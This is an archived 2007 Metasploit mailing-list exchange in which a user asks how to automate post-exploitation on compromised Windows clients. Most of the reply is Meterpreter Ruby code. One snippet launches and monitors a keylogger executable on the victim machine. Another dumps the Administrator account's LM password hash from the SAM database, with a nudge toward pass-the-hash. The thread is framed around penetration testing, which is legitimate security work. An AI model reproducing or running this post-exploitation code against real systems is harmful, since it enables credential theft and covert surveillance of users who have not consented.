Metasploit mailing list archives

Previous By Date Next
Previous By Thread Next

Meterpreter AutoExec?

From: jerome.athias at free.fr (Jerome Athias)
Date: Sat, 10 Nov 2007 14:57:57 +0100
Hi,

the design of the Meterpreter let you do this sort of things in an easy 
way: the meterpreter scripts! (thanks to The Alien ;-p)
look at /scripts/meterpreter/
you'll find the needed migrate.rb script

then, to launch a new process you'll use something like:

myproc = client.sys.process.execute("C:\\keylog.exe", "/S")
continue = false
while (continue == false)
    sleep 5
    pid_list = client.sys.process.processes().collect { |x| x["pid"] }
    if (pid_list.include?(myproc.pid) == false)
       continue = true
    end
end
print_status("Keylog installed")

to dump the LM hash of the Administrator account, use:

client.core.use("priv")
max = client.priv.sam_hashes.length - 1
for i in 0..max
    if client.priv.sam_hashes[i].user_id == "500"
       adm_name= client.priv.sam_hashes[i].user_name
       adm_lanman = client.priv.sam_hashes[i].lanman
    end
end
print_status("LM hash for " + adm_name +" is "+ adm_lanman)
# pass-the-hash anyone?

Then, ... just be creative & innovative!

My 2 euro cents
/JA
www.securinfos.info

Best regards to VV & the folks of MISC (don't forget about my website 
guys ;-))

CybyDude a ?crit :

Hi List!

Does Meterpreter support some sorta AutoExec script that can be executed post 
exploitation? I understand this sort of thing'd be possible through Ruby 
Scripts using MSF/Meterpreter API. But does MSF specifically look for 
something like autoexec (like AUTOEXEC.BAT in good old DOS)?

Basically, I'm interested in automating post exploitation measures for client 
side attacks, which may include:

1-Migration of Process to something safe before user terminates IE/OE/FF
2-Dump Hashes
3-Upload, deploy & init custom stuff like a key logger
4-Dash off a mail to the pentester about the vulnerable machine.

Could some one pls guide me in this regard?


Regards n' Best Wishes
CybyDude

-------------- next part --------------
A non-text attachment was scrubbed...
Name: smime.p7s
Type: application/x-pkcs7-signature
Size: 3253 bytes
Desc: S/MIME Cryptographic Signature
URL: <http://mail.metasploit.com/pipermail/framework/attachments/20071110/b15bffad/attachment.bin>
Previous By Date Next
Previous By Thread Next

Current thread: